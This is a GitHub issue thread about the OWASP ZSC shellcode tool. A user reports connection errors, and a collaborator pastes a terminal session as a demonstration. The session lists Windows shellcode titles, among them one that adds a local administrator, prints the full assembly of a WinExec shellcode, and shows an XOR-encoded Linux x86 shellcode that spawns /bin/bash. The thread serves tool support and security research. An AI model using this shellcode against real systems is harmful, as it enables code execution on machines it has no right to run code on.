ZSC made nothing #128

Open
iNoSec opened this issue Jan 12, 2018 · 5 comments
iNoSec commented Jan 12, 2018

Hi, whatever I choose I get an error; I can't see shellstorm shellcode because of a connection error or anything else. I saw there are a ton of bugs after an update; does it affect all the framework?

Author

iNoSec commented Jan 12, 2018

My bad, that's simply the copy/paste that makes the bug; if I type the command not like a big fat ass, that works. Can close this issue.

Author

iNoSec commented Jan 12, 2018

Just update doesn't work.

@Ali-Razmjoo
Collaborator

Works fine for me!


  ______          __      _____ _____    ______ _____  _____
 / __ \ \        / /\    / ____|  __ \  |___  // ____|/ ____|
| |  | \ \  /\  / /  \  | (___ | |__) |    / /| (___ | |
| |  | |\ \/  \/ / /\ \  \___ \|  ___/    / /  \___ \| |
| |__| | \  /\  / ____ \ ____) | |       / /__ ____) | |____
 \____/   \/  \/_/    \_\_____/|_|      /_____|_____/ \_____|


                OWASP ZeroDay Cyber Research Shellcoder

zsc> shellcode
zsc/shellcode>
download         generate         search           shell_storm_list
zsc/shellcode> search
keyword_to_search>
download         generate         search           shell_storm_list
keyword_to_search> winexec
[+] author: DATA_SNIPER shellcode_id: 148       platform: Windows       title: telnetbind by winexec - 111 bytes
[+] author: Lord Kelvin shellcode_id: 581       platform: Windows       title: XP sp3 (Ru) WinExec+ExitProcess cmd shellcode - 12 bytes
[+] author: RubberDuck  shellcode_id: 766       platform: Windows       title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes
[+] author: RubberDuck  shellcode_id: 662       platform: Windows       title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
[+] author: Weiss       shellcode_id: 391       platform: Windows       title: WinExec() Command Parameter - 104 bytes

zsc> shellcode
zsc/shellcode> download
shellcode_id> 391

;
; relocateable dynamic runtime assembly code example using hash lookup
;
; WinExec() with ExitThread()
; 104 bytes
;
; for testing:
;
; ml /c /coff /Cp wexec2.asm
; link /subsystem:windows /section:.text,w wexec2.obj
;
; wyse101 [at] gmail.com
;
; October 2006
;
.386
.model flat,stdcall

ROL_CONSTANT equ 5

mrol macro iNum:req,iBits:req
   exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm

mror macro iNum:req,iBits:req
   exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm

hashapi macro szApi
   local dwApi

   dwApi = 0

   forc x,szApi
      dwApi = dwApi + '&x'
      dwApi = mrol(dwApi,ROL_CONSTANT)
   endm
   dwApi = mrol(dwApi,ROL_CONSTANT)
   dw (dwApi and 0ffffh)
endm

.code

   assume fs:nothing

code_start:
   jmp load_data
setup_parameters:
   pop ebp
   xor ecx,ecx
   push ecx                                 ; ExitThread() exitcode
   push ecx                                 ; SW_HIDE
   mov cl,(cmd_end-api_hashes)              ; limit of 255 bytes per command
   inc byte ptr[ebp+ecx]
   lea eax,[ebp+(cmd_string-api_hashes)]
   push eax                                 ; WinExec command string
get_k32_base:
   mov cl,30h
   mov eax,fs:[ecx]
   mov eax,[eax+0ch]
   mov esi,[eax+1ch]
   lodsd
   mov ebx,[eax+08h]
get_api_loop:
   mov eax,[ebx+3ch]
   mov eax,[ebx+eax+78h]
   lea esi,[ebx+eax+1ch]
   mov cl,3
load_rva:
   lodsd
   add eax,ebx
   push eax
   loop load_rva
   pop ebp
   pop edi
load_api:
   mov esi,[edi+4*ecx]
   add esi,ebx
   xor eax,eax
   cdq
hash_api:
   lodsb
   add edx,eax
   rol edx,ROL_CONSTANT
   dec eax
   jns hash_api
   inc ecx
   mov eax,[esp+4]
   cmp dx,word ptr[eax]
   jne load_api
   pop eax
   movzx edx,word ptr[ebp+2*ecx-2]
   add ebx,[eax+4*edx]
   pop esi
   call ebx
   lodsw
   jmp get_k32_base
load_data:
   call setup_parameters
api_hashes:
   hashapi <WinExec>
   hashapi <ExitThread>
code_end:

cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh
cmd_end equ $-1

end code_start





Shellcode output to a .c file?(y or n)> n
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> linux_x86
zsc/shellcode/generate/linux_x86>
chmod            download         exec             script_executor  write
dir_create       download_execute file_create      system
zsc/shellcode/generate/linux_x86> exec
zsc/shellcode/generate/linux_x86/exec> file_to_execute
file_to_execute> /bin/bash

[+] file_to_execute set to "/bin/bash"

[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all


[+] enter encode type
zsc/shellcode/generate/linux_x86/exec/encode_type> xo
xor_random    xor_yourvalue
zsc/shellcode/generate/linux_x86/exec/encode_type> xor_random

Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x6a\x4e\x58\x83\xf0\x08\x31\xdb\x31\xc9\xcd\x80\x68\x6a\x45\x48\x62\x5b\x68\xfa\xd5\xd8\x0a\x58\x31\xd8\x50\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x37\x31\x4e\x57\x5b\x68\x18\x53\x2f\x24\x58\x31\xd8\x50\x68\x5a\x38\x65\x4c\x5b\x68\x75\x5a\x0c\x22\x58\x31\xd8\x50\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80

Shellcode output to a .c file?(y or n)> n
zsc> wrong input!
[!] interrupted by user!
Exit

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>python -V
Python 2.7.13

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>

@Ali-Razmjoo
Collaborator

If you still have errors, please provide your OS, OS version, and Python version.

Author

iNoSec commented Jan 12, 2018

Like I said, I copied/pasted the commands, but when I type them, everything works; just the update command fails with a connection error. I can download shellcode from shellstorm, so I have no problem with my connection. I'm not on my PC now, but I will look at the update URL in the code tonight.
I'm on ParrotOS and I use Python 2.7 for OWASP ZSC (I will confirm tonight).
Thanks
